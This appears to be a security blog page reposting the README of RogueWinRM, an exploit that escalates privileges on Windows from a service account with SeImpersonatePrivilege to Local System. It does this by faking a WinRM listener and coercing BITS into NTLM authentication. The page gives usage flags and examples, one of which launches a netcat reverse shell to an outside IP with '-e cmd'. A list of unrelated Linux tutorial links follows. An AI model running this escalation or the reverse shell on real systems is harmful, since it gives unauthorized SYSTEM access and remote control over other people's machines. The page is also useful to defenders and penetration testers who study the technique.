RogueWinRM : Windows Local Privilege Escalation From Service Account To System

RogueWinRM is a local privilege escalation exploit that allows to escalate from a Service account (with SeImpersonatePrivilege) to Local System account if WinRM service is not running (default on Win10 but NOT on Windows Server 2019).

Briefly, it will listen for incoming connection on port 5985 faking a real WinRM service.
It’s just a minimal webserver that will try to negotiate an NTLM authentication with any service that are trying to connect on that port.
Then the BITS service (running as Local System) is triggered and it will try to authenticate to our rogue listener. Once authenticated to our rogue listener, we are able to impersonate the Local System user spawning an arbitrary process with those privileges.

You can find a full technical description of this vulnerability at this link –> https://decoder.cloud/2019/12/06/we-thought-they-were-potatoes-but-they-were-beans/

Usage

RogueWinRM

Mandatory args:
-p : program to launch

Optional args:
-a : command line argument to pass to program (default NULL)
-l : listening port (default 5985 WinRM)
-d : Enable Debugging output

Examples

  • Running an interactive cmd:

RogueWinRM.exe -p C:\windows\system32\cmd.exe

  • Running netcat reverse shell:

RogueWinRM.exe -p C:\windows\temp\nc64.exe -a “10.0.0.1 3001 -e cmd”

Credit

R K

Recent Posts

cp Command: Copy Files and Directories in Linux

The cp command, short for "copy," is the main Linux utility for duplicating files and directories. Whether…

1 week ago

Image OSINT

Introduction In digital investigations, images often hold more information than meets the eye. With the…

1 week ago

cat Command: Read and Combine File Contents in Linux

The cat command short for concatenate, It is a fast and versatile tool for viewing and merging…

1 week ago

Port In Networking

What is a Port? A port in networking acts like a gateway that directs data…

1 week ago

ls Command: List Directory Contents in Linux

The ls command is fundamental for anyone working with Linux. It’s used to display the files and…

1 week ago

pwd Command: Find Your Location in Linux

The pwd (Print Working Directory) command is essential for navigating the Linux filesystem. It instantly shows your…

2 weeks ago